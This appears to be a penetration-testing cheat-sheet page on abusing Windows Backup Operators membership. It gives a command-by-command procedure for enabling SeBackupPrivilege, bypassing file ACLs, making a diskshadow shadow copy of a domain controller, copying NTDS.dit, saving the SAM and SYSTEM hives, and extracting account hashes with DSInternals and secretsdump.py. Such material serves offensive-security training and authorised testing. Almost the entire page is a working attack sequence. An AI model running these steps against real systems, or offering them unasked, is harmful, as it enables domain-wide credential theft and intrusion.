8.Windows-built-in-groups

Approach to Exploiting Windows Built-in Groups (Focus: Backup Operators)

Identify Group Memberships:

whoami /groups  # Check if the user is in "Backup Operators"

Verify SeBackupPrivilege:

whoami /priv  # Check if SeBackupPrivilege is present
Get-SeBackupPrivilege  # PowerShell cmdlet

Enable SeBackupPrivilege (if needed):

Set-SeBackupPrivilege  # PowerShell cmdlet

Import SeBackupPrivilege Modules:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Access Protected Files:

dir <protected_directory>  # Verify lack of access
Copy-FileSeBackupPrivilege <protected_file> <destination>
robocopy /B <source> <destination> <file>

Target Domain Controller (NTDS.dit):

diskshadow.exe  # Create shadow copy
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit <destination>
robocopy /B E:\Windows\NTDS\ <destination> ntds.dit

Backup Registry Hives:

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

Extract Credentials (NTDS.dit):

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName <DN> -DBPath .\ntds.dit -BootKey $key
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Commands:

whoami /groups
whoami /priv
diskshadow.exe
reg save
secretsdump.py
robocopy /B
dir

PowerShell Cmdlets:

Get-SeBackupPrivilege
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege
Import-Module .\DSInternals.psd1
Get-BootKey
Get-ADDBAccount
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Tools:

  • diskshadow.exe (Windows built-in)

  • reg.exe (Windows built-in)

  • secretsdump.py (Impacket)

  • robocopy.exe (Windows built-in)

  • DSInternals (PowerShell module)

  • SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll (Custom PowerShell modules)

Techniques:

  • Leverage SeBackupPrivilege to bypass file ACLs.

  • Use diskshadow to create shadow copies of locked files.

  • Extract credentials from NTDS.dit and registry hives.

  • Use robocopy as an alternative to custom scripts.

PreviousKey Concepts:NextExploiting Event Log Readers Group for Security Log Access

Last updated